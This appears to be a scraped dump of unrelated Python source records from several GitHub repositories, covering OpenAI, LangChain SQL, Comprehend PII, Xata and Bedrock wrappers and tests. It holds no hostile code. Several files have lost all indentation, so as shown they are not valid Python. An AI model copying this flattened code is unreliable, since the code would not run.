aux['ID_Topico'] = aux['ID_Topico'] + count
df_topicos = pd.concat([df_topicos, aux], ignore_index=True)
for j in topicos_general[i]:
topicos_mod.append([j[0] + count, j[1]])
count += len(topicos_general[i])
df_dict_topicos = pd.DataFrame(
topicos_mod, columns=['ID_Topico', 'Topico'])
df_topicos = df_topicos.set_index('ID_Articulo')
df_dict_topicos = df_dict_topicos.set_index('ID_Topico')
df_topicos.to_csv(os.path.join(path_medios, "data",
"curated", "topicos.csv"), encoding='utf-8-sig')
df_dict_topicos.to_csv(
os.path.join(path_medios, "data", "curated", "dict_topicos.csv"), encoding='utf-8-sig')
if __name__ == '__main__':
# freeze_support()
print('entro al main')
main()
print('corrio el main')
| [] |
2024-01-10 | life-Nd/RecipeCrawler | my_openai.py | import openai
from api_keys import ApiKeys

openai.api_key = ApiKeys.openai_api_key

print("\nAI: Hey, what's the question? ")
search = input("Me: ")
list_engines = ["text-davinci-002", "text-curie-001", "text-babbage-001",
                "text-ada-001", "code-davinci-002", "code-cushman-001"]
engine = list_engines[0]
temp = 0.5
tokens = 256
if search:
    response = openai.Completion.create(
        engine=engine,
        prompt=search,
        temperature=temp,
        max_tokens=tokens,
    )
    text = str(response["choices"][0]["text"]).strip()
    print("AI: " + text)
| [] |
2024-01-10 | cstone-io/flamingo-frameworks-api | src~services~core.py | import chromadb
from chromadb.config import Settings
from langchain.chat_models import ChatOpenAI
from langchain.vectorstores import Chroma
from langchain.chains import RetrievalQA
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.callbacks.manager import CallbackManager
from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler

from ..models.inputs import Query
from ..models.outputs import ChatResponse
from ..utils.config import Config

"""
Public Services
"""

config = Config.get()
chroma_kwargs = config.chromadb.to_dict()
chroma = chromadb.HttpClient(
    **chroma_kwargs, settings=Settings(chroma_api_impl="chromadb.api.fastapi.FastAPI")
)


async def chat(body: Query) -> ChatResponse:
    """
    Text report agent controller. This controller is responsible for handling
    requests to the /agents/text route.

    :param body: Query object
    :returns: string answer for successful requests
    """
    embeddings = OpenAIEmbeddings()
    vector_db = Chroma(client=chroma, embedding_function=embeddings)
    retriever = vector_db.as_retriever()

    llm_open = ChatOpenAI(
        model=config.langchain.model,
        callback_manager=CallbackManager([StreamingStdOutCallbackHandler()]),
    )

    qa_chain = RetrievalQA.from_chain_type(
        llm=llm_open,
        chain_type="stuff",
        retriever=retriever,
        return_source_documents=True,
        verbose=True,
    )

    chain_output = qa_chain(body.query)
    llm_response = ChatResponse(
        answer=chain_output["result"],
        sources=chain_output["source_documents"],
    )

    return llm_response
| [] |
2024-01-10 | glm3/TokenThrift | tests~test_initialization.py | import pytest
from unittest.mock import Mock

from token_thrift.token_thrift import TokenThrift
from token_thrift.queues.list_queue import ListQueue
from token_thrift.api_client.openai_api_client import OpenAIApiClient


class TestTokenThrift:
    @classmethod
    def setup_class(cls):
        cls.api_key = "sample_api_key"
        cls.budget_in_dollars = 500
        cls.queue = ListQueue()

    def test_initialization_with_valid_inputs(self):
        thrift = TokenThrift(self.api_key, self.budget_in_dollars, self.queue)
        assert thrift.api_key == self.api_key
        assert thrift.budget_in_dollars == self.budget_in_dollars
        assert thrift.total_dollar_spent == 0
        assert thrift.queue.is_empty()
        assert isinstance(thrift.api_client, OpenAIApiClient)

    def test_initialization_negative_budget(self):
        with pytest.raises(ValueError):
            thrift = TokenThrift(self.api_key, -500, self.queue)

    def test_initialization_no_api_key(self):
        with pytest.raises(ValueError):
            thrift = TokenThrift(None, self.budget_in_dollars, self.queue)

    def test_initialization_with_valid_inputs_no_queue(self):
        thrift = TokenThrift(self.api_key, self.budget_in_dollars)
        assert thrift.api_key == self.api_key
        assert thrift.budget_in_dollars == self.budget_in_dollars
        assert thrift.total_dollar_spent == 0
        assert isinstance(thrift.queue, ListQueue)

    def test_initialization_with_custom_api_client(self):
        mock_api_client = Mock()
        thrift = TokenThrift(self.api_key, self.budget_in_dollars, api_client=mock_api_client)
        assert thrift.api_client == mock_api_client | [] |
2024-01-10 | ashleyxuu/langchain | libs~langchain~langchain~utilities~sql_database.py | """SQLAlchemy wrapper around a database."""
from __future__ import annotations
import warnings
from typing import Any, Dict, Iterable, List, Literal, Optional, Sequence, Union
import sqlalchemy
from sqlalchemy import MetaData, Table, create_engine, inspect, select, text
from sqlalchemy.engine import Engine
from sqlalchemy.exc import ProgrammingError, SQLAlchemyError
from sqlalchemy.schema import CreateTable
from sqlalchemy.types import NullType
from langchain.utils import get_from_env
def _format_index(index: sqlalchemy.engine.interfaces.ReflectedIndex) -> str:
return (
f'Name: {index["name"]}, Unique: {index["unique"]},'
f' Columns: {str(index["column_names"])}'
)
def truncate_word(content: Any, *, length: int, suffix: str = "...") -> str:
"""
Truncate a string to a certain number of words, based on the max string
length.
"""
if not isinstance(content, str) or length <= 0:
return content
if len(content) <= length:
return content
return content[: length - len(suffix)].rsplit(" ", 1)[0] + suffix
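# Illustrative example: truncate_word("hello world foo", length=12) drops the
# partially fitting word and returns "hello...", while non-string content or a
# non-positive length is returned unchanged.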
class SQLDatabase:
"""SQLAlchemy wrapper around a database."""
def __init__(
self,
engine: Engine,
schema: Optional[str] = None,
metadata: Optional[MetaData] = None,
ignore_tables: Optional[List[str]] = None,
include_tables: Optional[List[str]] = None,
sample_rows_in_table_info: int = 3,
indexes_in_table_info: bool = False,
custom_table_info: Optional[dict] = None,
view_support: bool = False,
max_string_length: int = 300,
):
"""Create engine from database URI."""
self._engine = engine
self._schema = schema
if include_tables and ignore_tables:
raise ValueError("Cannot specify both include_tables and ignore_tables")
self._inspector = inspect(self._engine)
# including view support by adding the views as well as tables to the all
# tables list if view_support is True
self._all_tables = set(
self._inspector.get_table_names(schema=schema)
+ (self._inspector.get_view_names(schema=schema) if view_support else [])
)
self._include_tables = set(include_tables) if include_tables else set()
if self._include_tables:
missing_tables = self._include_tables - self._all_tables
if missing_tables:
raise ValueError(
f"include_tables {missing_tables} not found in database"
)
self._ignore_tables = set(ignore_tables) if ignore_tables else set()
if self._ignore_tables:
missing_tables = self._ignore_tables - self._all_tables
if missing_tables:
raise ValueError(
f"ignore_tables {missing_tables} not found in database"
)
usable_tables = self.get_usable_table_names()
self._usable_tables = set(usable_tables) if usable_tables else self._all_tables
if not isinstance(sample_rows_in_table_info, int):
raise TypeError("sample_rows_in_table_info must be an integer")
self._sample_rows_in_table_info = sample_rows_in_table_info
self._indexes_in_table_info = indexes_in_table_info
self._custom_table_info = custom_table_info
if self._custom_table_info:
if not isinstance(self._custom_table_info, dict):
raise TypeError(
"table_info must be a dictionary with table names as keys and the "
"desired table info as values"
)
# only keep the tables that are also present in the database
intersection = set(self._custom_table_info).intersection(self._all_tables)
self._custom_table_info = dict(
(table, self._custom_table_info[table])
for table in self._custom_table_info
if table in intersection
)
self._max_string_length = max_string_length
self._metadata = metadata or MetaData()
# including view support if view_support = true
self._metadata.reflect(
views=view_support,
bind=self._engine,
only=list(self._usable_tables),
schema=self._schema,
)
@classmethod
def from_uri(
cls, database_uri: str, engine_args: Optional[dict] = None, **kwargs: Any
) -> SQLDatabase:
"""Construct a SQLAlchemy engine from URI."""
_engine_args = engine_args or {}
return cls(create_engine(database_uri, **_engine_args), **kwargs)
@classmethod
def from_databricks(
cls,
catalog: str,
schema: str,
host: Optional[str] = None,
api_token: Optional[str] = None,
warehouse_id: Optional[str] = None,
cluster_id: Optional[str] = None,
engine_args: Optional[dict] = None,
**kwargs: Any,
) -> SQLDatabase:
"""
Class method to create an SQLDatabase instance from a Databricks connection.
This method requires the 'databricks-sql-connector' package. If not installed,
it can be added using `pip install databricks-sql-connector`.
Args:
catalog (str): The catalog name in the Databricks database.
schema (str): The schema name in the catalog.
host (Optional[str]): The Databricks workspace hostname, excluding
'https://' part. If not provided, it attempts to fetch from the
environment variable 'DATABRICKS_HOST'. If still unavailable and if
running in a Databricks notebook, it defaults to the current workspace
hostname. Defaults to None.
api_token (Optional[str]): The Databricks personal access token for
accessing the Databricks SQL warehouse or the cluster. If not provided,
it attempts to fetch from 'DATABRICKS_TOKEN'. If still unavailable
and running in a Databricks notebook, a temporary token for the current
user is generated. Defaults to None.
warehouse_id (Optional[str]): The warehouse ID in the Databricks SQL. If
provided, the method configures the connection to use this warehouse.
Cannot be used with 'cluster_id'. Defaults to None.
cluster_id (Optional[str]): The cluster ID in the Databricks Runtime. If
provided, the method configures the connection to use this cluster.
Cannot be used with 'warehouse_id'. If running in a Databricks notebook
and both 'warehouse_id' and 'cluster_id' are None, it uses the ID of the
cluster the notebook is attached to. Defaults to None.
engine_args (Optional[dict]): The arguments to be used when connecting
Databricks. Defaults to None.
**kwargs (Any): Additional keyword arguments for the `from_uri` method.
Returns:
SQLDatabase: An instance of SQLDatabase configured with the provided
Databricks connection details.
Raises:
ValueError: If 'databricks-sql-connector' is not found, or if both
'warehouse_id' and 'cluster_id' are provided, or if neither
'warehouse_id' nor 'cluster_id' are provided and it's not executing
inside a Databricks notebook.
"""
try:
from databricks import sql # noqa: F401
except ImportError:
raise ValueError(
"databricks-sql-connector package not found, please install with"
" `pip install databricks-sql-connector`"
)
context = None
try:
from dbruntime.databricks_repl_context import get_context
context = get_context()
except ImportError:
pass
default_host = context.browserHostName if context else None
if host is None:
host = get_from_env("host", "DATABRICKS_HOST", default_host)
default_api_token = context.apiToken if context else None
if api_token is None:
api_token = get_from_env("api_token", "DATABRICKS_TOKEN", default_api_token)
if warehouse_id is None and cluster_id is None:
if context:
cluster_id = context.clusterId
else:
raise ValueError(
"Need to provide either 'warehouse_id' or 'cluster_id'."
)
if warehouse_id and cluster_id:
raise ValueError("Can't have both 'warehouse_id' or 'cluster_id'.")
if warehouse_id:
http_path = f"/sql/1.0/warehouses/{warehouse_id}"
else:
http_path = f"/sql/protocolv1/o/0/{cluster_id}"
uri = (
f"databricks://token:{api_token}@{host}?"
f"http_path={http_path}&catalog={catalog}&schema={schema}"
)
return cls.from_uri(database_uri=uri, engine_args=engine_args, **kwargs)
@classmethod
def from_cnosdb(
cls,
url: str = "127.0.0.1:8902",
user: str = "root",
password: str = "",
tenant: str = "cnosdb",
database: str = "public",
) -> SQLDatabase:
"""
Class method to create an SQLDatabase instance from a CnosDB connection.
This method requires the 'cnos-connector' package. If not installed, it
can be added using `pip install cnos-connector`.
Args:
url (str): The HTTP connection host name and port number of the CnosDB
service, excluding "http://" or "https://", with a default value
of "127.0.0.1:8902".
user (str): The username used to connect to the CnosDB service, with a
default value of "root".
password (str): The password of the user connecting to the CnosDB service,
with a default value of "".
tenant (str): The name of the tenant used to connect to the CnosDB service,
with a default value of "cnosdb".
database (str): The name of the database in the CnosDB tenant.
Returns:
SQLDatabase: An instance of SQLDatabase configured with the provided
CnosDB connection details.
"""
try:
from cnosdb_connector import make_cnosdb_langchain_uri
uri = make_cnosdb_langchain_uri(url, user, password, tenant, database)
return cls.from_uri(database_uri=uri)
except ImportError:
raise ValueError(
"cnos-connector package not found, please install with"
" `pip install cnos-connector`"
)
@property
def dialect(self) -> str:
"""Return string representation of dialect to use."""
return self._engine.dialect.name
def get_usable_table_names(self) -> Iterable[str]:
"""Get names of tables available."""
if self._include_tables:
return sorted(self._include_tables)
return sorted(self._all_tables - self._ignore_tables)
def get_table_names(self) -> Iterable[str]:
"""Get names of tables available."""
warnings.warn(
"This method is deprecated - please use `get_usable_table_names`."
)
return self.get_usable_table_names()
@property
def table_info(self) -> str:
"""Information about all tables in the database."""
return self.get_table_info()
def get_table_info(self, table_names: Optional[List[str]] = None) -> str:
"""Get information about specified tables.
Follows best practices as specified in: Rajkumar et al, 2022
(https://arxiv.org/abs/2204.00498)
If `sample_rows_in_table_info`, the specified number of sample rows will be
appended to each table description. This can increase performance as
demonstrated in the paper.
"""
all_table_names = self.get_usable_table_names()
if table_names is not None:
missing_tables = set(table_names).difference(all_table_names)
if missing_tables:
raise ValueError(f"table_names {missing_tables} not found in database")
all_table_names = table_names
meta_tables = [
tbl
for tbl in self._metadata.sorted_tables
if tbl.name in set(all_table_names)
and not (self.dialect == "sqlite" and tbl.name.startswith("sqlite_"))
]
tables = []
for table in meta_tables:
if self._custom_table_info and table.name in self._custom_table_info:
tables.append(self._custom_table_info[table.name])
continue
# Ignore JSON datatyped columns
for k, v in table.columns.items():
if type(v.type) is NullType:
table._columns.remove(v)
# add create table command
create_table = str(CreateTable(table).compile(self._engine))
table_info = f"{create_table.rstrip()}"
has_extra_info = (
self._indexes_in_table_info or self._sample_rows_in_table_info
)
if has_extra_info:
table_info += "\n\n/*"
if self._indexes_in_table_info:
table_info += f"\n{self._get_table_indexes(table)}\n"
if self._sample_rows_in_table_info:
table_info += f"\n{self._get_sample_rows(table)}\n"
if has_extra_info:
table_info += "*/"
tables.append(table_info)
tables.sort()
final_str = "\n\n".join(tables)
return final_str
def _get_table_indexes(self, table: Table) -> str:
indexes = self._inspector.get_indexes(table.name)
indexes_formatted = "\n".join(map(_format_index, indexes))
return f"Table Indexes:\n{indexes_formatted}"
def _get_sample_rows(self, table: Table) -> str:
# build the select command
command = select(table).limit(self._sample_rows_in_table_info)
# save the columns in string format
columns_str = "\t".join([col.name for col in table.columns])
try:
# get the sample rows
with self._engine.connect() as connection:
sample_rows_result = connection.execute(command) # type: ignore
# shorten values in the sample rows
sample_rows = list(
map(lambda ls: [str(i)[:100] for i in ls], sample_rows_result)
)
# save the sample rows in string format
sample_rows_str = "\n".join(["\t".join(row) for row in sample_rows])
# in some dialects when there are no rows in the table a
# 'ProgrammingError' is returned
except ProgrammingError:
sample_rows_str = ""
return (
f"{self._sample_rows_in_table_info} rows from {table.name} table:\n"
f"{columns_str}\n"
f"{sample_rows_str}"
)
def _execute(
self,
command: str,
fetch: Union[Literal["all"], Literal["one"]] = "all",
) -> Sequence[Dict[str, Any]]:
"""
Executes SQL command through underlying engine.
If the statement returns no rows, an empty list is returned.
"""
with self._engine.begin() as connection:
if self._schema is not None:
if self.dialect == "snowflake":
connection.exec_driver_sql(
f"ALTER SESSION SET search_path='{self._schema}'"
)
elif self.dialect == "bigquery":
connection.exec_driver_sql(f"SET @@dataset_id='{self._schema}'")
elif self.dialect == "mssql":
pass
elif self.dialect == "trino":
connection.exec_driver_sql(f"USE {self._schema}")
else: # postgresql and compatible dialects
connection.exec_driver_sql(f"SET search_path TO {self._schema}")
cursor = connection.execute(text(command))
if cursor.returns_rows:
if fetch == "all":
result = [x._asdict() for x in cursor.fetchall()]
elif fetch == "one":
first_result = cursor.fetchone()
result = [] if first_result is None else [first_result._asdict()]
else:
raise ValueError("Fetch parameter must be either 'one' or 'all'")
return result
return []
def run(
self,
command: str,
fetch: Union[Literal["all"], Literal["one"]] = "all",
) -> str:
"""Execute a SQL command and return a string representing the results.
If the statement returns rows, a string of the results is returned.
If the statement returns no rows, an empty string is returned.
"""
result = self._execute(command, fetch)
# Convert columns values to string to avoid issues with sqlalchemy
# truncating text
res = [
tuple(truncate_word(c, length=self._max_string_length) for c in r.values())
for r in result
]
if not res:
return ""
else:
return str(res)
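# Illustrative example (assuming a SQLite connection): db.run("SELECT 1")
# returns the string "[(1,)]", while a statement that produces no rows returns
# the empty string.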
def get_table_info_no_throw(self, table_names: Optional[List[str]] = None) -> str:
"""Get information about specified tables.
Follows best practices as specified in: Rajkumar et al, 2022
(https://arxiv.org/abs/2204.00498)
If `sample_rows_in_table_info`, the specified number of sample rows will be
appended to each table description. This can increase performance as
demonstrated in the paper.
"""
try:
return self.get_table_info(table_names)
except ValueError as e:
"""Format the error message"""
return f"Error: {e}"
def run_no_throw(
self,
command: str,
fetch: Union[Literal["all"], Literal["one"]] = "all",
) -> str:
"""Execute a SQL command and return a string representing the results.
If the statement returns rows, a string of the results is returned.
If the statement returns no rows, an empty string is returned.
If the statement throws an error, the error message is returned.
"""
try:
return self.run(command, fetch)
except SQLAlchemyError as e:
"""Format the error message"""
return f"Error: {e}"
| [] |
2024-01-10 | ashleyxuu/langchain | libs~experimental~langchain_experimental~comprehend_moderation~pii.py | import asyncio
from typing import Any, Dict, Optional
from langchain_experimental.comprehend_moderation.base_moderation_exceptions import (
ModerationPiiError,
)
class ComprehendPII:
def __init__(
self,
client: Any,
callback: Optional[Any] = None,
unique_id: Optional[str] = None,
chain_id: Optional[str] = None,
) -> None:
self.client = client
self.moderation_beacon = {
"moderation_chain_id": chain_id,
"moderation_type": "PII",
"moderation_status": "LABELS_NOT_FOUND",
}
self.callback = callback
self.unique_id = unique_id
def validate(self, prompt_value: str, config: Any = None) -> str:
redact = config.get("redact")
return (
self._detect_pii(prompt_value=prompt_value, config=config)
if redact
else self._contains_pii(prompt_value=prompt_value, config=config)
)
def _contains_pii(self, prompt_value: str, config: Any = None) -> str:
"""
Checks for Personally Identifiable Information (PII) labels above a
specified threshold. Uses Amazon Comprehend Contains PII Entities API. See -
https://docs.aws.amazon.com/comprehend/latest/APIReference/API_ContainsPiiEntities.html
Args:
prompt_value (str): The input text to be checked for PII labels.
config (Dict[str, Any]): Configuration for PII check and actions.
Returns:
str: the original prompt
Note:
- The provided client should be initialized with valid AWS credentials.
"""
pii_identified = self.client.contains_pii_entities(
Text=prompt_value, LanguageCode="en"
)
if self.callback and self.callback.pii_callback:
self.moderation_beacon["moderation_input"] = prompt_value
self.moderation_beacon["moderation_output"] = pii_identified
threshold = config.get("threshold")
pii_labels = config.get("labels")
pii_found = False
for entity in pii_identified["Labels"]:
if (entity["Score"] >= threshold and entity["Name"] in pii_labels) or (
entity["Score"] >= threshold and not pii_labels
):
pii_found = True
break
if self.callback and self.callback.pii_callback:
if pii_found:
self.moderation_beacon["moderation_status"] = "LABELS_FOUND"
asyncio.create_task(
self.callback.on_after_pii(self.moderation_beacon, self.unique_id)
)
if pii_found:
raise ModerationPiiError
return prompt_value
def _detect_pii(self, prompt_value: str, config: Optional[Dict[str, Any]]) -> str:
"""
Detects and handles Personally Identifiable Information (PII) entities in the
given prompt text using Amazon Comprehend's detect_pii_entities API. The
function provides options to redact or stop processing based on the identified
PII entities and a provided configuration. Uses Amazon Comprehend Detect PII
Entities API.
Args:
prompt_value (str): The input text to be checked for PII entities.
config (Dict[str, Any]): A configuration specifying how to handle
PII entities.
Returns:
str: The processed prompt text with redacted PII entities or raised
exceptions.
Raises:
ValueError: If the prompt contains configured PII entities for
stopping processing.
Note:
- If PII is not found in the prompt, the original prompt is returned.
- The client should be initialized with valid AWS credentials.
"""
pii_identified = self.client.detect_pii_entities(
Text=prompt_value, LanguageCode="en"
)
if self.callback and self.callback.pii_callback:
self.moderation_beacon["moderation_input"] = prompt_value
self.moderation_beacon["moderation_output"] = pii_identified
if (pii_identified["Entities"]) == []:
if self.callback and self.callback.pii_callback:
asyncio.create_task(
self.callback.on_after_pii(self.moderation_beacon, self.unique_id)
)
return prompt_value
pii_found = False
if not config and pii_identified["Entities"]:
for entity in pii_identified["Entities"]:
if entity["Score"] >= 0.5:
pii_found = True
break
if self.callback and self.callback.pii_callback:
if pii_found:
self.moderation_beacon["moderation_status"] = "LABELS_FOUND"
asyncio.create_task(
self.callback.on_after_pii(self.moderation_beacon, self.unique_id)
)
if pii_found:
raise ModerationPiiError
else:
threshold = config.get("threshold") # type: ignore
pii_labels = config.get("labels") # type: ignore
mask_marker = config.get("mask_character") # type: ignore
pii_found = False
for entity in pii_identified["Entities"]:
if (
pii_labels
and entity["Type"] in pii_labels
and entity["Score"] >= threshold
) or (not pii_labels and entity["Score"] >= threshold):
pii_found = True
char_offset_begin = entity["BeginOffset"]
char_offset_end = entity["EndOffset"]
mask_length = char_offset_end - char_offset_begin + 1
masked_part = mask_marker * mask_length
prompt_value = (
prompt_value[:char_offset_begin]
+ masked_part
+ prompt_value[char_offset_end + 1 :]
)
if self.callback and self.callback.pii_callback:
if pii_found:
self.moderation_beacon["moderation_status"] = "LABELS_FOUND"
asyncio.create_task(
self.callback.on_after_pii(self.moderation_beacon, self.unique_id)
)
return prompt_value
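# Illustrative note: validate() dispatches on config["redact"] -- when redaction
# is enabled, _detect_pii overwrites qualifying entity spans with runs of the
# configured mask_character; otherwise _contains_pii raises ModerationPiiError
# as soon as a PII label meets the threshold.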
| [] |
2024-01-10 | ashleyxuu/langchain | libs~langchain~tests~integration_tests~vectorstores~test_xata.py | """Test Xata vector store functionality.
Before running this test, please create a Xata database by following
the instructions from:
https://python.langchain.com/docs/integrations/vectorstores/xata
"""
import os

from langchain.docstore.document import Document
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores.xata import XataVectorStore


class TestXata:
    @classmethod
    def setup_class(cls) -> None:
        assert os.getenv("XATA_API_KEY"), "XATA_API_KEY environment variable is not set"
        assert os.getenv("XATA_DB_URL"), "XATA_DB_URL environment variable is not set"

    def test_similarity_search_without_metadata(
        self, embedding_openai: OpenAIEmbeddings
    ) -> None:
        """Test end to end constructions and search without metadata."""
        texts = ["foo", "bar", "baz"]
        docsearch = XataVectorStore.from_texts(
            api_key=os.getenv("XATA_API_KEY"),
            db_url=os.getenv("XATA_DB_URL"),
            texts=texts,
            embedding=embedding_openai,
        )
        docsearch.wait_for_indexing(ndocs=3)
        output = docsearch.similarity_search("foo", k=1)
        assert output == [Document(page_content="foo")]
        docsearch.delete(delete_all=True)

    def test_similarity_search_with_metadata(
        self, embedding_openai: OpenAIEmbeddings
    ) -> None:
        """Test end to end construction and search with a metadata filter.
        This test requires a column named "a" of type integer to be present
        in the Xata table."""
        texts = ["foo", "foo", "foo"]
        metadatas = [{"a": i} for i in range(len(texts))]
        docsearch = XataVectorStore.from_texts(
            api_key=os.getenv("XATA_API_KEY"),
            db_url=os.getenv("XATA_DB_URL"),
            texts=texts,
            embedding=embedding_openai,
            metadatas=metadatas,
        )
        docsearch.wait_for_indexing(ndocs=3)
        output = docsearch.similarity_search("foo", k=1, filter={"a": 1})
        assert output == [Document(page_content="foo", metadata={"a": 1})]
        docsearch.delete(delete_all=True)
| [] |
2024-01-10 | ashleyxuu/langchain | libs~langchain~langchain~llms~bedrock.py | import json
from abc import ABC
from typing import Any, Dict, Iterator, List, Mapping, Optional
from langchain.callbacks.manager import CallbackManagerForLLMRun
from langchain.llms.base import LLM
from langchain.llms.utils import enforce_stop_tokens
from langchain.pydantic_v1 import BaseModel, Extra, root_validator
from langchain.schema.output import GenerationChunk
HUMAN_PROMPT = "\n\nHuman:"
ASSISTANT_PROMPT = "\n\nAssistant:"
ALTERNATION_ERROR = (
"Error: Prompt must alternate between '\n\nHuman:' and '\n\nAssistant:'."
)
def _add_newlines_before_ha(input_text: str) -> str:
new_text = input_text
for word in ["Human:", "Assistant:"]:
new_text = new_text.replace(word, "\n\n" + word)
for i in range(2):
new_text = new_text.replace("\n\n\n" + word, "\n\n" + word)
return new_text
def _human_assistant_format(input_text: str) -> str:
if input_text.count("Human:") == 0 or (
input_text.find("Human:") > input_text.find("Assistant:")
and "Assistant:" in input_text
):
input_text = HUMAN_PROMPT + " " + input_text # SILENT CORRECTION
if input_text.count("Assistant:") == 0:
input_text = input_text + ASSISTANT_PROMPT # SILENT CORRECTION
if input_text[: len("Human:")] == "Human:":
input_text = "\n\n" + input_text
input_text = _add_newlines_before_ha(input_text)
count = 0
# track alternation
for i in range(len(input_text)):
if input_text[i : i + len(HUMAN_PROMPT)] == HUMAN_PROMPT:
if count % 2 == 0:
count += 1
else:
raise ValueError(ALTERNATION_ERROR)
if input_text[i : i + len(ASSISTANT_PROMPT)] == ASSISTANT_PROMPT:
if count % 2 == 1:
count += 1
else:
raise ValueError(ALTERNATION_ERROR)
if count % 2 == 1: # Only saw Human, no Assistant
input_text = input_text + ASSISTANT_PROMPT # SILENT CORRECTION
return input_text
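# Illustrative example (not from the original source) of the transformation
# performed by _human_assistant_format: a bare prompt is wrapped into the
# alternating Human/Assistant turns that Anthropic models on Bedrock expect.
#     _human_assistant_format("Tell me a joke.")
#     returns "\n\nHuman: Tell me a joke.\n\nAssistant:"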
class LLMInputOutputAdapter:
"""Adapter class to prepare the inputs from Langchain to a format
that LLM model expects.
It also provides helper function to extract
the generated text from the model response."""
provider_to_output_key_map = {
"anthropic": "completion",
"amazon": "outputText",
}
@classmethod
def prepare_input(
cls, provider: str, prompt: str, model_kwargs: Dict[str, Any]
) -> Dict[str, Any]:
input_body = {**model_kwargs}
if provider == "anthropic":
input_body["prompt"] = _human_assistant_format(prompt)
elif provider == "ai21":
input_body["prompt"] = prompt
elif provider == "amazon":
input_body = dict()
input_body["inputText"] = prompt
input_body["textGenerationConfig"] = {**model_kwargs}
else:
input_body["inputText"] = prompt
if provider == "anthropic" and "max_tokens_to_sample" not in input_body:
input_body["max_tokens_to_sample"] = 256
return input_body
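    # Rough sketch (for illustration only) of the request bodies produced above;
    # the exact fields are defined by each Bedrock model provider:
    #     anthropic -> {"prompt": "\n\nHuman: ...\n\nAssistant:", "max_tokens_to_sample": 256, ...}
    #     ai21      -> {"prompt": "...", ...}
    #     amazon    -> {"inputText": "...", "textGenerationConfig": {...}}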
@classmethod
def prepare_output(cls, provider: str, response: Any) -> str:
if provider == "anthropic":
response_body = json.loads(response.get("body").read().decode())
return response_body.get("completion")
else:
response_body = json.loads(response.get("body").read())
if provider == "ai21":
return response_body.get("completions")[0].get("data").get("text")
else:
return response_body.get("results")[0].get("outputText")
@classmethod
def prepare_output_stream(
cls, provider: str, response: Any, stop: Optional[List[str]] = None
) -> Iterator[GenerationChunk]:
stream = response.get("body")
if not stream:
return
if provider not in cls.provider_to_output_key_map:
raise ValueError(
f"Unknown streaming response output key for provider: {provider}"
)
for event in stream:
chunk = event.get("chunk")
if chunk:
chunk_obj = json.loads(chunk.get("bytes").decode())
# chunk obj format varies with provider
yield GenerationChunk(
text=chunk_obj[cls.provider_to_output_key_map[provider]]
)
class BedrockBase(BaseModel, ABC):
client: Any #: :meta private:
region_name: Optional[str] = None
"""The aws region e.g., `us-west-2`. Fallsback to AWS_DEFAULT_REGION env variable
or region specified in ~/.aws/config in case it is not provided here.
"""
credentials_profile_name: Optional[str] = None
"""The name of the profile in the ~/.aws/credentials or ~/.aws/config files, which
has either access keys or role information specified.
If not specified, the default credential profile or, if on an EC2 instance,
credentials from IMDS will be used.
See: https://boto3.amazonaws.com/v1/documentation/api/latest/guide/credentials.html
"""
model_id: str
"""Id of the model to call, e.g., amazon.titan-text-express-v1, this is
equivalent to the modelId property in the list-foundation-models api"""
model_kwargs: Optional[Dict] = None
"""Keyword arguments to pass to the model."""
endpoint_url: Optional[str] = None
"""Needed if you don't want to default to us-east-1 endpoint"""
streaming: bool = False
"""Whether to stream the results."""
provider_stop_sequence_key_name_map: Mapping[str, str] = {
"anthropic": "stop_sequences",
"amazon": "stopSequences",
"ai21": "stop_sequences",
}
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that AWS credentials to and python package exists in environment."""
# Skip creating new client if passed in constructor
if values["client"] is not None:
return values
try:
import boto3
if values["credentials_profile_name"] is not None:
session = boto3.Session(profile_name=values["credentials_profile_name"])
else:
# use default credentials
session = boto3.Session()
client_params = {}
if values["region_name"]:
client_params["region_name"] = values["region_name"]
if values["endpoint_url"]:
client_params["endpoint_url"] = values["endpoint_url"]
values["client"] = session.client("bedrock-runtime", **client_params)
except ImportError:
raise ModuleNotFoundError(
"Could not import boto3 python package. "
"Please install it with `pip install boto3`."
)
except Exception as e:
raise ValueError(
"Could not load credentials to authenticate with AWS client. "
"Please check that credentials in the specified "
"profile name are valid."
) from e
return values
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
_model_kwargs = self.model_kwargs or {}
return {
**{"model_kwargs": _model_kwargs},
}
def _get_provider(self) -> str:
return self.model_id.split(".")[0]
def _prepare_input_and_invoke(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> str:
_model_kwargs = self.model_kwargs or {}
provider = self._get_provider()
params = {**_model_kwargs, **kwargs}
input_body = LLMInputOutputAdapter.prepare_input(provider, prompt, params)
body = json.dumps(input_body)
accept = "application/json"
contentType = "application/json"
try:
response = self.client.invoke_model(
body=body, modelId=self.model_id, accept=accept, contentType=contentType
)
text = LLMInputOutputAdapter.prepare_output(provider, response)
except Exception as e:
raise ValueError(f"Error raised by bedrock service: {e}")
if stop is not None:
text = enforce_stop_tokens(text, stop)
return text
def _prepare_input_and_invoke_stream(
self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Iterator[GenerationChunk]:
_model_kwargs = self.model_kwargs or {}
provider = self._get_provider()
if stop:
if provider not in self.provider_stop_sequence_key_name_map:
raise ValueError(
f"Stop sequence key name for {provider} is not supported."
)
# stop sequence from _generate() overrides
# stop sequences in the class attribute
            _model_kwargs[
                self.provider_stop_sequence_key_name_map.get(provider)
            ] = stop
params = {**_model_kwargs, **kwargs}
input_body = LLMInputOutputAdapter.prepare_input(provider, prompt, params)
body = json.dumps(input_body)
try:
response = self.client.invoke_model_with_response_stream(
body=body,
modelId=self.model_id,
accept="application/json",
contentType="application/json",
)
except Exception as e:
raise ValueError(f"Error raised by bedrock service: {e}")
for chunk in LLMInputOutputAdapter.prepare_output_stream(
provider, response, stop
):
yield chunk
if run_manager is not None:
run_manager.on_llm_new_token(chunk.text, chunk=chunk)
class Bedrock(LLM, BedrockBase):
"""Bedrock models.
To authenticate, the AWS client uses the following methods to
automatically load credentials:
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/credentials.html
If a specific credential profile should be used, you must pass
the name of the profile from the ~/.aws/credentials file that is to be used.
Make sure the credentials / roles used have the required policies to
access the Bedrock service.
"""
"""
Example:
.. code-block:: python
from bedrock_langchain.bedrock_llm import BedrockLLM
llm = BedrockLLM(
credentials_profile_name="default",
